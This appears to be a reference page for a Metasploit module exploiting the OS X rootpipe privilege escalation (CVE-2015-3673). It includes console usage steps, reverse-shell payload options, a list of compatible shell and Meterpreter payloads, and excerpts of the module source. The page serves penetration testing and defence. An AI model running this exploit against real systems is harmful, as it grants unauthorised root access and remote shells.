Apple OS X Entitlements Rootpipe Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/osx/local/rootpipe_entitlements metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Apple OS X Entitlements Rootpipe Privilege Escalation
Module: exploit/osx/local/rootpipe_entitlements
Source code: modules/exploits/osx/local/rootpipe_entitlements.rb
Disclosure date: 2015-07-01
Last modification time: 2021-02-17 12:33:59 +0000
Supported architecture(s): x64
Supported platform(s): OSX
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2015-3673

This module exploits the rootpipe vulnerability and bypasses Apple's initial fix for the issue by injecting code into a process with the 'admin.writeconfig' entitlement.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/osx/local/rootpipe_entitlements
msf exploit(rootpipe_entitlements) > show targets
    ... a list of targets ...
msf exploit(rootpipe_entitlements) > set TARGET target-id
msf exploit(rootpipe_entitlements) > show options
    ... show and set options ...
msf exploit(rootpipe_entitlements) > set SESSION session-id
msf exploit(rootpipe_entitlements) > exploit

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the osx/local/rootpipe_entitlements exploit module looks in the msfconsole:

msf6 > use exploit/osx/local/rootpipe_entitlements

[*] Using configured payload osx/x64/shell_reverse_tcp
msf6 exploit(osx/local/rootpipe_entitlements) > show info

       Name: Apple OS X Entitlements Rootpipe Privilege Escalation
     Module: exploit/osx/local/rootpipe_entitlements
   Platform: OSX
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2015-07-01

Provided by:
  Emil Kvarnhammar
  joev <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Mac OS X 10.9-10.10.3

Check supported:
  Yes

Basic options:
  Name         Current Setting  Required  Description
  ----         ---------------  --------  -----------
  SESSION                       yes       The session to run this module on.
  WRITABLEDIR  /.Trashes        yes       Writable directory

Payload information:

Description:
  This module exploits the rootpipe vulnerability and bypasses Apple's 
  initial fix for the issue by injecting code into a process with the 
  'admin.writeconfig' entitlement.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-3673
  https://truesecdev.wordpress.com/2015/07/01/exploiting-rootpipe-again/

Module Options


This is a complete list of options available in the osx/local/rootpipe_entitlements exploit:

msf6 exploit(osx/local/rootpipe_entitlements) > show options

Module options (exploit/osx/local/rootpipe_entitlements):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION                       yes       The session to run this module on.
   WRITABLEDIR  /.Trashes        yes       Writable directory

Payload options (osx/x64/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CMD    /bin/sh          yes       The command string to execute
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Mac OS X 10.9-10.10.3

Advanced Options


Here is a complete list of advanced options supported by the osx/local/rootpipe_entitlements exploit:

msf6 exploit(osx/local/rootpipe_entitlements) > show advanced

Module advanced options (exploit/osx/local/rootpipe_entitlements):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (osx/x64/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AppendExit                  false            no        Append a stub that executes the exit(0) system call
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   PrependSetgid               false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid             false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetreuid             true             no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid               false            no        Prepend a stub that executes the setuid(0) system call
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the osx/local/rootpipe_entitlements module can exploit:

msf6 exploit(osx/local/rootpipe_entitlements) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Mac OS X 10.9-10.10.3

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the osx/local/rootpipe_entitlements exploit:

msf6 exploit(osx/local/rootpipe_entitlements) > show payloads

Compatible Payloads
===================

   #   Name                                           Disclosure Date  Rank    Check  Description
   -   ----                                           ---------------  ----    -----  -----------
   0   payload/generic/custom                                          normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                  normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                               normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/osx/x64/dupandexecve/bind_tcp                           normal  No     OS X dup2 Command Shell, Bind TCP Stager
   4   payload/osx/x64/dupandexecve/reverse_tcp                        normal  No     OS X dup2 Command Shell, Reverse TCP Stager
   5   payload/osx/x64/dupandexecve/reverse_tcp_uuid                   normal  No     OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)
   6   payload/osx/x64/exec                                            normal  No     OS X x64 Execute Command
   7   payload/osx/x64/meterpreter/bind_tcp                            normal  No     OSX Meterpreter, Bind TCP Stager
   8   payload/osx/x64/meterpreter/reverse_tcp                         normal  No     OSX Meterpreter, Reverse TCP Stager
   9   payload/osx/x64/meterpreter/reverse_tcp_uuid                    normal  No     OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)
   10  payload/osx/x64/meterpreter_reverse_http                        normal  No     OSX Meterpreter, Reverse HTTP Inline
   11  payload/osx/x64/meterpreter_reverse_https                       normal  No     OSX Meterpreter, Reverse HTTPS Inline
   12  payload/osx/x64/meterpreter_reverse_tcp                         normal  No     OSX Meterpreter, Reverse TCP Inline
   13  payload/osx/x64/say                                             normal  No     OS X x64 say Shellcode
   14  payload/osx/x64/shell_bind_tcp                                  normal  No     OS X x64 Shell Bind TCP
   15  payload/osx/x64/shell_reverse_tcp                               normal  No     OS X x64 Shell Reverse TCP

Evasion Options


Here is the full list of possible evasion options supported by the osx/local/rootpipe_entitlements exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(osx/local/rootpipe_entitlements) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Session already has root privileges


Here is a relevant code snippet related to the "Session already has root privileges" error message:

62:	    end
63:	  end
64:	
65:	  def exploit
66:	    if is_root?
67:	      fail_with Failure::BadConfig, 'Session already has root privileges'
68:	    end
69:	
70:	    unless is_admin?
71:	      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."
72:	    end

User is not in the 'admin' group, bailing.


Here is a relevant code snippet related to the "User is not in the 'admin' group, bailing." error message:

66:	    if is_root?
67:	      fail_with Failure::BadConfig, 'Session already has root privileges'
68:	    end
69:	
70:	    unless is_admin?
71:	      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."
72:	    end
73:	
74:	    if check != CheckCode::Appears
75:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
76:	    end

Target is not vulnerable


Here is a relevant code snippet related to the "Target is not vulnerable" error message:

70:	    unless is_admin?
71:	      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."
72:	    end
73:	
74:	    if check != CheckCode::Appears
75:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
76:	    end
77:	
78:	    unless writable? base_dir
79:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
80:	    end

<BASE_DIR> is not writable


Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:

74:	    if check != CheckCode::Appears
75:	      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
76:	    end
77:	
78:	    unless writable? base_dir
79:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
80:	    end
81:	
82:	    print_status("Copying Directory Utility.app to #{new_app}")
83:	    cmd_exec("cp -R '/System/Library/CoreServices/Applications/Directory Utility.app' '#{new_app}'")
84:	    cmd_exec("mkdir -p '#{new_app}/Contents/PlugIns/RootpipeBundle.daplug/Contents/MacOS'")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Emil Kvarnhammar
  • joev

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.